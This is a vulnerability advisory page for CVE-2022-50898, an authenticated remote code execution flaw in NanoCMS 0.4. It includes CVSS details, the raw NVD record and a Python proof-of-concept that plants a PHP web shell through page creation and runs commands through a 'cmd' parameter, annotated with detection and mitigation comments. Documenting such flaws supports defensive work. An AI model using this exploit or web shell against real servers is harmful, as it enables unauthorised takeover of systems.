Security Vulnerability Report
CVE-2022-50898 CVSS 8.8 HIGH

CVE-2022-50898

Published: 2026-01-13 23:15:52
Last Modified: 2026-01-29 14:16:12

Description

NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution because page content is not validated when a page is created. The page creation mechanism performs no proper input sanitization, so an authenticated attacker can use it to write PHP files containing arbitrary code into the server's pages directory.

CVSS Details

CVSS Score
8.8
Severity
HIGH
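CVSS Vector (v3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the raw JSON record below also carries a CVSS 4.0 assessment (base score 8.6, HIGH) that rates Privileges Required as HIGH rather than LOW, so the two vectors disagree on how much access the attacker needs.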

Configurations (Affected Products)

cpe:2.3:a:kalyan02:nanocms:0.4:*:*:*:*:*:*:* - VULNERABLE
NanoCMS 0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2022-50898 NanoCMS 0.4 Authenticated RCE PoC
# Target: NanoCMS 0.4
# Vulnerability: Authenticated file upload leading to RCE
#
# Reviewer notes (defensive reading of this listing):
# - Flow: log in, save a page whose content is PHP source, then request the
#   saved page as a .php file so the web server interprets it.
# - The advisory on this page classifies the root cause as CWE-434: page
#   content is written into a web-served directory without validation.
# - Detection ideas that follow from the requests below: authenticated POSTs
#   whose `content` field carries a PHP open tag, new .php files appearing
#   under the pages directory, and GETs to that directory with a `cmd`
#   query parameter.
# - Mitigation ideas: stop the web server from executing PHP out of the
#   content directory, validate/escape page content on save, and restrict who
#   can reach the admin login. No fixed version is named on this page.
# - The endpoint paths are reproduced as the PoC author wrote them and have
#   not been checked against the NanoCMS source; Step 3 was never implemented.


def exploit(target_url, username, password, command):
    """
    Replay the NanoCMS 0.4 authenticated page-creation flow from the PoC.

    :param target_url: Base URL of the target NanoCMS installation
    :param username: Valid username for authentication
    :param password: Password for the user
    :param command: System command passed as the ``cmd`` query parameter
    """
    http = requests.Session()

    # Step 1: log in so later requests carry the authenticated session.
    auth_endpoint = f"{target_url}/index.php"
    auth_form = {
        'user': username,
        'pass': password,
        'submit': 'Login'
    }

    try:
        # The login response is not inspected, so bad credentials are not
        # detected at this point.
        http.post(auth_endpoint, data=auth_form, timeout=10)

        # Step 2: save a page whose body is PHP. This is the request an
        # application-side content check would need to reject.
        edit_endpoint = f"{target_url}/?action=edit_page"
        webshell_content = "<?php system($_GET['cmd']); ?>"
        page_form = {
            'title': 'pwned',
            'content': webshell_content,
            'submit': 'Save'
        }
        http.post(edit_endpoint, data=page_form, timeout=10)

        # Step 3 (not implemented in the original): the stored filename is
        # assumed below rather than read back from the response.

        # Step 4: request the stored page. The PHP only runs if the server is
        # configured to interpret files in this directory.
        stored_page = f"{target_url}/data/pages/pwned.php"
        reply = http.get(stored_page, params={'cmd': command}, timeout=10)

        # NOTE: a 200 only shows that the URL answered; it does not by itself
        # prove the command ran.
        if reply.status_code != 200:
            print(f"[-] Exploitation failed. Status code: {reply.status_code}")
        else:
            print("[+] Command executed successfully!")
            print(f"Output: {reply.text}")

    except requests.exceptions.RequestException as err:
        print(f"[-] Error: {err}")


if __name__ == '__main__':
    # Four positional arguments are required; anything less prints usage.
    if len(sys.argv) < 5:
        script = sys.argv[0]
        print(f"Usage: {script} <target_url> <username> <password> <command>")
        print(f"Example: {script} http://target.com admin admin123 'whoami'")
        sys.exit(1)

    target, user, pwd, cmd = sys.argv[1:5]

    exploit(target, user, pwd, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50898", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:51.833", "lastModified": "2026-01-29T14:16:11.793", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution through unvalidated page content creation. Authenticated attackers can upload PHP files with arbitrary code to the server's pages directory by exploiting the page creation mechanism without proper input sanitization."}, {"lang": "es", "value": "NanoCMS 0.4 contiene una vulnerabilidad de carga de archivos autenticada que permite la ejecución remota de código a través de la creación de contenido de página no validado. Atacantes autenticados pueden subir archivos PHP con código arbitrario al directorio de páginas del servidor explotando el mecanismo de creación de páginas sin una sanitización de entrada adecuada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kalyan02:nanocms:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "BF61FF4D-D98D-41FD-8DB6-222EDE01B34E"}]}]}], "references": [{"url": "https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/kalyan02/NanoCMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50997", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/nanocms-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": 
["Third Party Advisory"]}, {"url": "https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}